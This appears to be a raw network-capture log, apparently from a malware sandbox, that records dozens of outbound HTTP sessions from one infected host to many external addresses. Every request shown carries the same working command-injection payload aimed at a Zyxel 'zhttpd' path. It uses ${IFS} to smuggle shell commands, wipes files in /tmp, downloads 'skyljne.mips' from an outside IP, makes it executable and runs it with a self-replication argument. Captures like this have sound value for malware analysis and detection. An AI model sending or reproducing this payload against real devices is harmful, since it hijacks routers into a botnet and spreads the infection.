                                        Jan 14, 2024 16:18:33.179040909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1219192.168.2.134408894.126.163.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179079056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1220192.168.2.135309235.227.61.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179126024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1221192.168.2.133432461.131.185.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179194927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1222192.168.2.1337364192.12.249.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179229021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1223192.168.2.133744659.195.107.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179259062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1224192.168.2.133789851.125.70.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179295063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1225192.168.2.1342846129.178.67.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179338932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1226192.168.2.133683643.232.228.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179364920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1227192.168.2.133865619.217.122.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179425955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1228192.168.2.1353186119.223.97.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179462910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1229192.168.2.1335176185.209.247.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179483891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1230192.168.2.1341992105.255.133.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179516077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1231192.168.2.1354562137.229.65.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179562092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1232192.168.2.1359508144.150.212.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179596901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1233192.168.2.1339148144.101.175.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179642916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1234192.168.2.1348042152.6.54.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179685116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1235192.168.2.133774459.73.193.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179711103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1236192.168.2.133283458.40.53.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179738045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1237192.168.2.135606840.188.251.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179795980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1238192.168.2.1344712144.129.77.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179857016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1239192.168.2.1337450100.13.70.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179889917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1240192.168.2.1344618134.210.9.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179939032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1241192.168.2.135637291.115.118.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.179975033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1242192.168.2.1341268116.0.138.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180006981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1243192.168.2.135201651.16.232.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180053949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1244192.168.2.1339240140.255.52.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180077076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1245192.168.2.1333578157.53.170.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180130005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1246192.168.2.1360472129.47.140.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180147886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1247192.168.2.1355578203.59.212.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180182934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1248192.168.2.1345506112.184.100.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180205107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1249192.168.2.134431448.149.225.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180263042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1250192.168.2.1355988113.157.186.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180306911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1251192.168.2.1335118216.224.184.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180344105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1252192.168.2.134409832.141.192.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180370092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1253192.168.2.1341498166.116.171.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180423975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1254192.168.2.1354180125.252.107.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180464983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1255192.168.2.134428473.185.130.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180493116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1256192.168.2.1346058122.166.190.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180529118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1257192.168.2.1333490107.84.195.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180573940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1258192.168.2.135717084.99.230.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180593967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1259192.168.2.134280670.132.238.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180634022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1260192.168.2.1345492173.233.56.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180701017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1261192.168.2.135308842.65.244.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180742025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1262192.168.2.1342434200.14.223.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180789948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1263192.168.2.1333508185.161.133.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180819035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1264192.168.2.1340738171.63.89.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180869102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1265192.168.2.134471036.244.32.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180908918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1266192.168.2.134659674.194.29.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180959940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1267192.168.2.1349488213.154.120.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.180996895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1268192.168.2.134783481.168.137.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181034088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1269192.168.2.134292424.185.67.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181068897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1270192.168.2.134904086.23.67.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181114912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1271192.168.2.1352582128.146.182.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181219101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1272192.168.2.1348208148.138.113.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181221962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1273192.168.2.136025273.14.166.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181241989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1274192.168.2.135571831.117.234.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181276083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1275192.168.2.134143044.207.92.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181298018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1276192.168.2.1333674176.95.103.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181351900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1277192.168.2.1359434188.163.85.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181374073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1278192.168.2.1351676202.213.133.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181428909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1279192.168.2.1336046181.79.161.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181458950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1280192.168.2.1338726126.75.158.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.181524992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1281192.168.2.1353886157.76.150.224443
                                        TimestampBytes transferredDirectionData
